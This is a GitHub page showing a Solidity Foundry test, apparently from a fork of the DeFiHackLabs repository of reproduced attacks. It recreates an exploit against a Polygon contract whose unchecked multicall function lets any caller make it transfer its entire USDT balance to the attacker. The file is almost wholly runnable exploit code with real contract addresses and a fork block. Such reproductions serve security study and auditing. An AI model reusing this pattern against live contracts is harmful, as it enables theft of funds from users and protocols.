forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
MulticallWithoutCheck_exp.sol
51 lines (43 loc) · 1.42 KB
/
MulticallWithoutCheck_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
// Address https://polygonscan.com/address/0x940ce652a51ebadb5df09d605dbeda95fdcf697b
interface Target {
struct Call {
address target;
bytes callData;
uint256 value;
}
function multicallWithoutCheck(Call[] memory calls) external;
}
contract ContractTest is DSTest{
struct Call {
address target;
bytes callData;
uint256 value;
}
Target target = Target(0x940cE652A51EBadB5dF09d605dBEDA95fDcF697b);
IERC20 USDT = IERC20(0xc2132D05D31c914a87C6611C10748AEb04B58e8F);
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("polygon", 34743770);
}
function testExploit() public{
uint USDTBlance = USDT.balanceOf(address(target));
bytes memory data = abi.encodeWithSignature("transfer(address,uint256)", address(this), USDTBlance);
Target.Call memory inputData = Target.Call({
target: address(USDT),
callData: data,
value: 0
});
Target.Call [] memory calls = new Target.Call[](1);
calls[0] = inputData;
target.multicallWithoutCheck(calls);
emit log_named_decimal_uint(
"[End] Attacker USDT balance after exploit",
USDT.balanceOf(address(this)),
6
);
}
}